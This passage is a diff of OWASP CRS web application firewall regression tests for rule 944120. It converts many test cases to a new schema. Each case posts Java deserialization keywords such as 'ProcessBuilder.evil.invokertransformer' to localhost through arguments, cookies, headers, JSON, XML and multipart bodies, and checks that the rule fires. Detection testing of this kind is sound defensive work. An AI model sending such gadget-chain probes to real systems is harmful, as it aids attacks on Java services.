"{\"ProcessBuilder.evil.instantiatefactory\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 48 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-49 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 49 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatefactory": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-50 + {"ProcessBuilder.evil.instantiatefactory": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 50 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: 
form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-51 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 51 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatefactory" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; 
boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatefactory - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-52 + ProcessBuilder.evil.instantiatefactory + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 52 desc: "Argument test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-53 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 53 desc: "Argument name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-54 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer=test" + output: + log: + expect_ids: [944120] + - test_id: 54 desc: "Cookie test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-55 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: 
"/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 55 desc: "Cookie name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.instantiatetransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-56 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: ProcessBuilder.evil.instantiatetransformer=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 56 desc: "Request header test includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: ProcessBuilder.evil.instantiatetransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-57 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + 
Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: ProcessBuilder.evil.instantiatetransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 57 desc: "XML element includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-58 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "value" + output: + log: + no_expect_ids: [944120] + - test_id: 58 desc: "XML attribute name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: 
"element_value" - output: - no_log_contains: "id \"944120\"" - - test_title: 944120-59 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + no_expect_ids: [944120] + - test_id: 59 desc: "XML attribute value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-60 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log: + expect_ids: [944120] + - test_id: 60 desc: "XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: 
"en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-61 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 61 desc: "Nested XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-62 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 62 desc: "Content-Type text/plain includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - 
Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.instantiatetransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-63 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.instantiatetransformer" + output: + log: + expect_ids: [944120] + - test_id: 63 desc: "Content-Type application/json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"ProcessBuilder.evil.instantiatetransformer\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-64 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": 
\"ProcessBuilder.evil.instantiatetransformer\"}" + output: + log: + expect_ids: [944120] + - test_id: 64 desc: "Content-Type application/json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" - output: - log_contains: "id \"944120\"" - - test_title: 944120-65 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"ProcessBuilder.evil.instantiatetransformer\": \"test\"}" + output: + log: + expect_ids: [944120] + - test_id: 65 desc: "Content-Type multipart/form-data json arg name includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: 
"127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-66 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 66 desc: "Content-Type multipart/form-data json arg value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/json + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: 
"/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/json - {"ProcessBuilder.evil.instantiatetransformer": "test"} - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-67 + {"ProcessBuilder.evil.instantiatetransformer": "test"} + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 67 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-68 + ProcessBuilder.evil.instantiatetransformer + 
-----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 68 desc: "Content-Type multipart/form-data XML element value includes keyword ProcessBuilder.evil.instantiatetransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: | - -----------------------------thisissparta - Content-Disposition: form-data; name="payload" - Content-Type: application/xml + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "multipart/form-data; boundary=---------------------------thisissparta" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: | + -----------------------------thisissparta + Content-Disposition: form-data; name="payload" + Content-Type: application/xml - ProcessBuilder.evil.instantiatetransformer - -----------------------------thisissparta-- - output: - log_contains: "id \"944120\"" - - test_title: 944120-69 + ProcessBuilder.evil.instantiatetransformer + -----------------------------thisissparta-- + output: + log: + expect_ids: [944120] + - test_id: 69 desc: "Argument test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=ProcessBuilder.evil.invokertransformer" - output: - log_contains: "id \"944120\"" - - test_title: 944120-70 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=ProcessBuilder.evil.invokertransformer" + output: + log: + expect_ids: [944120] + - test_id: 70 desc: "Argument name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "ProcessBuilder.evil.invokertransformer=test" - output: - log_contains: "id \"944120\"" - - test_title: 944120-71 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "ProcessBuilder.evil.invokertransformer=test" + output: 
+ log: + expect_ids: [944120] + - test_id: 71 desc: "Cookie test includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=ProcessBuilder.evil.invokertransformer - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944120\"" - - test_title: 944120-72 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=ProcessBuilder.evil.invokertransformer + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log: + expect_ids: [944120] + - test_id: 72 desc: "Cookie name includes keyword ProcessBuilder.evil.invokertransformer" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: ProcessBuilder.evil.invokertransformer=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - 